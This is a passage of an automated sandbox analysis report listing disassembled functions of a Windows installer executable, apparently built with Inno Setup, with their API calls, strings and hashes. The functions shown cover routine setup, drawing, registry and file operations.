                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeLibrary$MessageNotifySend
                                                                                                                            • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                                                            • API String ID: 3817813901-1884538726
                                                                                                                            • Opcode ID: 465e20e9b424049c750abeefdcaa0399268f60af279eeffeb6245f27988e7504
                                                                                                                            • Instruction ID: b122ee3e0244d1cffd13458a0655c780be2d4a3cdc4850abd58d30bc7702deed
                                                                                                                            • Opcode Fuzzy Hash: 465e20e9b424049c750abeefdcaa0399268f60af279eeffeb6245f27988e7504
                                                                                                                            • Instruction Fuzzy Hash: C651BF347042409FD715EB69E9A5B6E7BE8EB19314F10887BE800C72B2DB389C46CB5D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046168C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SHGetMalloc.SHELL32(?), ref: 004616C7
                                                                                                                            • GetActiveWindow.USER32 ref: 0046172B
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 0046173F
                                                                                                                            • SHBrowseForFolder.SHELL32(?), ref: 00461756
                                                                                                                            • 76C9D120.OLE32(00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046176B
                                                                                                                            • SetActiveWindow.USER32(?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 00461781
                                                                                                                            • SetActiveWindow.USER32(?,?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046178A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ActiveWindow$BrowseD120FolderInitializeMalloc
                                                                                                                            • String ID: A
                                                                                                                            • API String ID: 2698730301-3554254475
                                                                                                                            • Opcode ID: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                                                            • Instruction ID: 0f37cca2ee7d5c89cd5c8fe3b5c5f67eac08b275376d6c087401a1ac056189be
                                                                                                                            • Opcode Fuzzy Hash: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                                                            • Instruction Fuzzy Hash: C3312F70E00348AFDB10EFA6D885A9EBBF8EB09304F55847AF404E7251E7785A048F59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004729F8 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 67COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15,?,?,00000000,00472F84), ref: 00472A1C
                                                                                                                              • Part of subcall function 0042CD94: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE0A
                                                                                                                              • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15), ref: 00472A93
                                                                                                                            • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000), ref: 00472A99
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                                                            • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                                                            • API String ID: 884541143-1710247218
                                                                                                                            • Opcode ID: eae8990b6dfb44545e31b666042918a45f1fae412ad7defa904a2210dacbb06f
                                                                                                                            • Instruction ID: 1765d5ebfc4e6887f49e3816ac39c9d5a3c16910e93b0aec031ce55b1572895b
                                                                                                                            • Opcode Fuzzy Hash: eae8990b6dfb44545e31b666042918a45f1fae412ad7defa904a2210dacbb06f
                                                                                                                            • Instruction Fuzzy Hash: 6711B2707005147BD721EAAA8D82B9F73ACDB49714F61C17BB404B72C2DBBCAE01861C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0045D2B4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 41libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D2BD
                                                                                                                            • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D2CD
                                                                                                                            • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D2DD
                                                                                                                            • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D2ED
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc
                                                                                                                            • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                                                            • API String ID: 190572456-3516654456
                                                                                                                            • Opcode ID: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                                                            • Instruction ID: d913f85fec6517a53d2ec7ba369195fd603025f4bffd93910817278a70f0814a
                                                                                                                            • Opcode Fuzzy Hash: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                                                            • Instruction Fuzzy Hash: C20112B0D00701DBE724DFF6ACC672636A5ABA8306F14C03B9D09962A2D77D0459DF2E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041A8DC Relevance: 13.7, APIs: 9, Instructions: 176windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041A9B9
                                                                                                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041A9F3
                                                                                                                            • SetBkColor.GDI32(?,?), ref: 0041AA08
                                                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA52
                                                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041AA5D
                                                                                                                            • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA6D
                                                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAAC
                                                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041AAB6
                                                                                                                            • SetBkColor.GDI32(00000000,?), ref: 0041AAC3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Color$StretchText
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2984075790-0
                                                                                                                            • Opcode ID: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                                                            • Instruction ID: 4467ea82dd13d464879b0bd0dd0607b47ee3045dce17e21d2c6451b7f26a8ea4
                                                                                                                            • Opcode Fuzzy Hash: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                                                            • Instruction Fuzzy Hash: 8761E5B5A00505AFCB40EFADD985E9AB7F8EF08314B10816AF908DB262C775ED40CF58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004580C4 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 126COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                                            • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458278,?, /s ",?,regsvr32.exe",?,00458278), ref: 004581EA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseDirectoryHandleSystem
                                                                                                                            • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                                                            • API String ID: 2051275411-1862435767
                                                                                                                            • Opcode ID: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                                                            • Instruction ID: cda81b302c56d3c3b7af3d8ffa4af26d40175ae7a7c1cff7e24eee752c39b11a
                                                                                                                            • Opcode Fuzzy Hash: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                                                            • Instruction Fuzzy Hash: 21411670A047486BDB10EFD6D842B8DBBF9AF45305F50407FB904BB292DF789A098B19
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0044D178 Relevance: 13.6, APIs: 9, Instructions: 90COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A9
                                                                                                                            • GetSysColor.USER32(00000014), ref: 0044D1B0
                                                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C8
                                                                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1F1
                                                                                                                            • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1FB
                                                                                                                            • GetSysColor.USER32(00000010), ref: 0044D202
                                                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0044D21A
                                                                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D243
                                                                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D26E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Text$Color$Draw$OffsetRect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1005981011-0
                                                                                                                            • Opcode ID: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                                                            • Instruction ID: 8406a00effd73db105afccad7da3796984cf264811f0ddac3e5cace4e0ac1d2b
                                                                                                                            • Opcode Fuzzy Hash: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                                                            • Instruction Fuzzy Hash: A021BDB42015047FC710FB2ACD8AE8B6BDCDF19319B05457AB958EB292C67CDD404668
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041B66C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFocus.USER32 ref: 0041B745
                                                                                                                            • GetDC.USER32(?), ref: 0041B751
                                                                                                                            • SelectPalette.GDI32(00000000,?,00000000), ref: 0041B786
                                                                                                                            • RealizePalette.GDI32(00000000), ref: 0041B792
                                                                                                                            • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041B7C0
                                                                                                                            • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041B7F4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                                                            • String ID: %H
                                                                                                                            • API String ID: 3275473261-1959103961
                                                                                                                            • Opcode ID: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                                                            • Instruction ID: 38bdddf8d72f5571b31e8017bfcff87152bbfcb95d4f6cd7f9962c0a723fddb9
                                                                                                                            • Opcode Fuzzy Hash: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                                                            • Instruction Fuzzy Hash: 8A512F70A002099FDF11DFA9C881AEEBBF9FF49704F104066F504A7791D7799981CBA9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041B93C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFocus.USER32 ref: 0041BA17
                                                                                                                            • GetDC.USER32(?), ref: 0041BA23
                                                                                                                            • SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA5D
                                                                                                                            • RealizePalette.GDI32(00000000), ref: 0041BA69
                                                                                                                            • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA8D
                                                                                                                            • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAC1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                                                            • String ID: %H
                                                                                                                            • API String ID: 3275473261-1959103961
                                                                                                                            • Opcode ID: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                                                            • Instruction ID: 3fcaffe560058c7771eaec6053d79e0e1924f360d52694d27862de55114c0f48
                                                                                                                            • Opcode Fuzzy Hash: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                                                            • Instruction Fuzzy Hash: 9D512A74A002189FDB11DFA9C891AAEBBF9FF49700F154066F904EB751D738AD40CBA4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004964F4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90sleepsynchronizationthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                                              • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 00496585
                                                                                                                            • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496599
                                                                                                                            • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004965B3
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965BF
                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965C5
                                                                                                                            • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965D8
                                                                                                                            Strings
                                                                                                                            • Deleting Uninstall data files., xrefs: 004964FB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                                                            • String ID: Deleting Uninstall data files.
                                                                                                                            • API String ID: 1570157960-2568741658
                                                                                                                            • Opcode ID: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                                                            • Instruction ID: caddedc05ae4add9971b90b84c259ce0cd5246952d50e779d54ebc968ffbf915
                                                                                                                            • Opcode Fuzzy Hash: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                                                            • Instruction Fuzzy Hash: 73216170204250BFEB10EB6ABC82B2637A8DB54728F53453BB501961D6DA7CAC448A6D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004701FC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89registrywindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                            • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9,?,?,?,?,00000000), ref: 00470263
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9), ref: 0047027A
                                                                                                                            • AddFontResourceA.GDI32(00000000), ref: 00470297
                                                                                                                            • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004702AB
                                                                                                                            Strings
                                                                                                                            • Failed to set value in Fonts registry key., xrefs: 0047026C
                                                                                                                            • AddFontResource, xrefs: 004702B5
                                                                                                                            • Failed to open Fonts registry key., xrefs: 00470281
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                                                            • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                                                            • API String ID: 955540645-649663873
                                                                                                                            • Opcode ID: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                                                            • Instruction ID: 122e39bb1ea2b43e4c2a7da55aa69ddad999e5e54c07bca5f4119535fc7344d3
                                                                                                                            • Opcode Fuzzy Hash: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                                                            • Instruction Fuzzy Hash: 6921E271741204BBDB10EAA68C46FAE67AC9B14704F208477B904EB3C3DA7C9E01866D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00462E30 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00416410: GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                                                              • Part of subcall function 00416410: UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                                                              • Part of subcall function 00416410: RegisterClassA.USER32(?), ref: 004164CE
                                                                                                                            • GetVersion.KERNEL32 ref: 00462E60
                                                                                                                            • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462E9E
                                                                                                                            • SHGetFileInfo.SHELL32(00462F3C,00000000,?,00000160,00004011), ref: 00462EBB
                                                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 00462ED9
                                                                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462EDF
                                                                                                                            • SetCursor.USER32(?,00462F1F,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462F12
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                                                            • String ID: Explorer
                                                                                                                            • API String ID: 2594429197-512347832
                                                                                                                            • Opcode ID: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                                                            • Instruction ID: b0f6820fd5a5ea072646c086af9eca81c98a3cd1ffd9b7ca0f87214cf94a4ba1
                                                                                                                            • Opcode Fuzzy Hash: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
